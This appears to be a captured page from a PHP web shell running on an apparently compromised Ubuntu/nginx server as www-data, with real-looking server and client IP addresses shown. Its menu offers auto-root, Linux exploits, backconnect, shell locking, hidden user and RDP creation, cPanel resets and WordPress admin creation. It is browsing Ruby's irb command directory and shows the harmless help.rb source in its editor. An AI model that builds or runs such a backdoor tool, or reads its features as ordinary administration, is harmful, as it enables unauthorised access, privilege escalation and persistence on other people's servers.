Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
3.0.0 /
irb /
cmd /
[ HOME SHELL ]
Name
Size
Permission
Action
chws.rb
537
B
-rw-r--r--
fork.rb
642
B
-rw-r--r--
help.rb
901
B
-rw-r--r--
info.rb
614
B
-rw-r--r--
load.rb
1.2
KB
-rw-r--r--
ls.rb
2.39
KB
-rw-r--r--
measure.rb
1.04
KB
-rw-r--r--
nop.rb
796
B
-rw-r--r--
pushws.rb
677
B
-rw-r--r--
show_source.rb
2.91
KB
-rw-r--r--
subirb.rb
661
B
-rw-r--r--
whereami.rb
362
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : help.rb
# frozen_string_literal: false # # help.rb - helper using ri # $Release Version: 0.9.6$ # $Revision$ # # -- # # # require_relative "nop" # :stopdoc: module IRB module ExtendCommand class Help < Nop def execute(*names) require 'rdoc/ri/driver' IRB::ExtendCommand::Help.const_set(:Ri, RDoc::RI::Driver.new) rescue LoadError, SystemExit IRB::ExtendCommand::Help.remove_method(:execute) # raise NoMethodError in ensure else def execute(*names) if names.empty? Ri.interactive return end names.each do |name| begin Ri.display_name(name.to_s) rescue RDoc::RI::Error puts $!.message end end nil end nil ensure execute(*names) end end end end # :startdoc:
Close